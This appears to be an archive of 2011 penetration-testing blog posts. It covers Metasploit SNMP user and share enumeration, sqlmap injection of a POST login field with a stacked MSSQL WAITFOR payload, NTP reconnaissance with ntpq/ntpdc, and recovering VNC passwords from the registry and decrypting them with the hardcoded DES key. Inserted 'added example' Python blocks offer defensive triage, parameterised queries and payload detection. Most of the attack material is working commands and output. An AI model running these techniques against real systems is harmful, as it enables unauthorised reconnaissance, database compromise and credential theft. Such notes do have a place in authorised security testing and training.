my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.
msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run
[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP
msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run
[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP
msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run
[+] 192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
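Added example, not part of the original post or of Metasploit: a small Python triage over the snmp_login output above. It pulls out which hosts accepted default community strings, which got READ-WRITE, and which are Windows boxes where the LanManager MIB hands over users and shares the way the two modules above did. The log text is a constructed copy of the run shown.

```python
import re

# Constructed sample: the snmp_login lines from the run above, verbatim.
SCAN_LOG = """\
[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
"""

FOUND = re.compile(r"^\[\+\] SNMP: (\S+) community string: '([^']*)' info: '(.*)'$")
WRITE = re.compile(r"^\[\*\] Host (\S+) provides READ-WRITE access with community '([^']*)'$")
DEFAULT_COMMUNITIES = {"public", "private"}

def _new_host():
    return {"communities": set(), "rw": set(), "sysdescr": ""}

def parse_snmp_login(log_text):
    """Group snmp_login findings per host: communities, write access, sysDescr."""
    hosts = {}
    for line in log_text.splitlines():
        m = FOUND.match(line)
        if m:
            host = hosts.setdefault(m.group(1), _new_host())
            host["communities"].add(m.group(2))
            host["sysdescr"] = m.group(3)
            continue
        m = WRITE.match(line)
        if m:
            hosts.setdefault(m.group(1), _new_host())["rw"].add(m.group(2))
    return hosts

def triage(log_text):
    """Per host, the findings a defender acts on. A Windows sysDescr matters
    because the LanManager MIB (users, shares) is readable with any community."""
    report = {}
    for addr, host in parse_snmp_login(log_text).items():
        issues = []
        if host["communities"] & DEFAULT_COMMUNITIES:
            issues.append("default community string accepted")
        if host["rw"]:
            issues.append("read-write community: %s" % ", ".join(sorted(host["rw"])))
        if "Windows" in host["sysdescr"]:
            issues.append("windows host: lanmanager mib exposes users and shares")
        report[addr] = issues
    return report
```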
Wednesday, March 23, 2011
Monday, March 21, 2011
sqlmap with POST requests
Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <--Force back-end DBMS to this value
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the parameters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
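Added example, not from the original post: Python that shows why the --prefix of ') was needed and what the payload above turns into server-side, using an assumed query shape (a parenthesised WHERE clause; the real login.aspx query is not on the page). It also carries the parameterised version of the same lookup and a simple log-side check for time-delay payloads.

```python
import re, sqlite3
from urllib.parse import unquote_plus

# Assumed query shape (not from the page): sqlmap's prefix "')" and postfix
# "AND ('yTwo'='yTwo" only balance if the WHERE clause is parenthesised.
TEMPLATE = "SELECT name FROM users WHERE (name='{u}' AND pw='{p}')"

# POST body exactly as sqlmap reported it in the run above.
SQLMAP_BODY = ("usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo"
               "&passwordTxt=blah&submitBtn=Log+On")

TIME_BASED = re.compile(r"WAITFOR\s+DELAY|\bSLEEP\s*\(|PG_SLEEP|BENCHMARK\s*\(", re.I)

def form_fields(body):
    """Split an x-www-form-urlencoded body on '&' only (';' in a value is data)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def vulnerable_query(fields):
    """String concatenation: the submitted text is parsed as SQL."""
    return TEMPLATE.format(u=fields["usernameTxt"], p=fields["passwordTxt"])

def statements(sql):
    """Split on ';' outside single quotes so stacked statements become visible."""
    out, buf, quoted = [], "", False
    for ch in sql:
        quoted ^= (ch == "'")
        if ch == ";" and not quoted:
            out.append(buf)
            buf = ""
        else:
            buf += ch
    out.append(buf)
    return [s.strip() for s in out if s.strip()]

def flags_time_based(body):
    """Log/WAF-side check: does any field carry a time-delay primitive?"""
    return any(TIME_BASED.search(v) for v in form_fields(body).values())

def safe_lookup(fields):
    """Parameterised: the same body is bound as data (sqlite3 stands in for MSSQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(name TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return con.execute("SELECT name FROM users WHERE (name=? AND pw=?)",
                       (fields["usernameTxt"], fields["passwordTxt"])).fetchone()
```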
Friday, March 18, 2011
I forgot my NTP stuff, so here's more notes on it
yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so I had to remember how to use the NTP tools to pull some info.
here are my notes:
http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205
http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]
ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>
chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030
ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)
ntpq> host
current host is 192.168.1.60
ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00, stratum=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144
ntpq> hostnames
hostnames being shown
ntpq> keytype
keytype is MD5
ntpq> ntpversion
NTP version being claimed is 2
ntpq> associations
ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4
ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, stratum=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96
chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4 90 1044 476
chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
stratum: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s
chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de
chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974
chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
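Added example (not from the post): a Python helper for reading the output above. It decodes the hex NTP timestamps that readlist, pstatus and sysinfo print, and parses a reslist to report whether the default restrict entries lack noquery, which is why the host above answered every one of those queries. The reslist sample is constructed from the output shown.

```python
from datetime import datetime, timedelta, timezone

NTP_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)

def ntp_hex_to_datetime(stamp):
    """Decode an NTP timestamp printed as 'seconds.fraction' in hex (era 0)."""
    secs_hex, frac_hex = stamp.split(".")
    micros = round(int(frac_hex, 16) / 2**32 * 1_000_000)
    return NTP_EPOCH + timedelta(seconds=int(secs_hex, 16), microseconds=micros)

# Constructed from the 'ntpdc -c reslist' output above (v4/v6 defaults only).
RESLIST = """\
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
:: :: 0 nomodify, nopeer
"""

def default_restrict_flags(reslist_text):
    """Flags on the catch-all entries (0.0.0.0/0.0.0.0 and ::/::) of reslist."""
    flags = {}
    for line in reslist_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0] in ("0.0.0.0", "::") and parts[1] == parts[0]:
            raw = parts[3]
            flags[parts[0]] = set() if raw == "none" else {f.strip() for f in raw.split(",")}
    return flags

def open_to_remote_queries(reslist_text):
    """Default entries lacking 'noquery' or 'ignore': the host answers the ntpq
    and ntpdc status queries shown above (readlist, monlist, sysinfo) to anyone."""
    return sorted(addr for addr, f in default_restrict_flags(reslist_text).items()
                  if not f & {"noquery", "ignore"})
```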
Tuesday, March 15, 2011
VNC passwords and Metasploit and DES
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.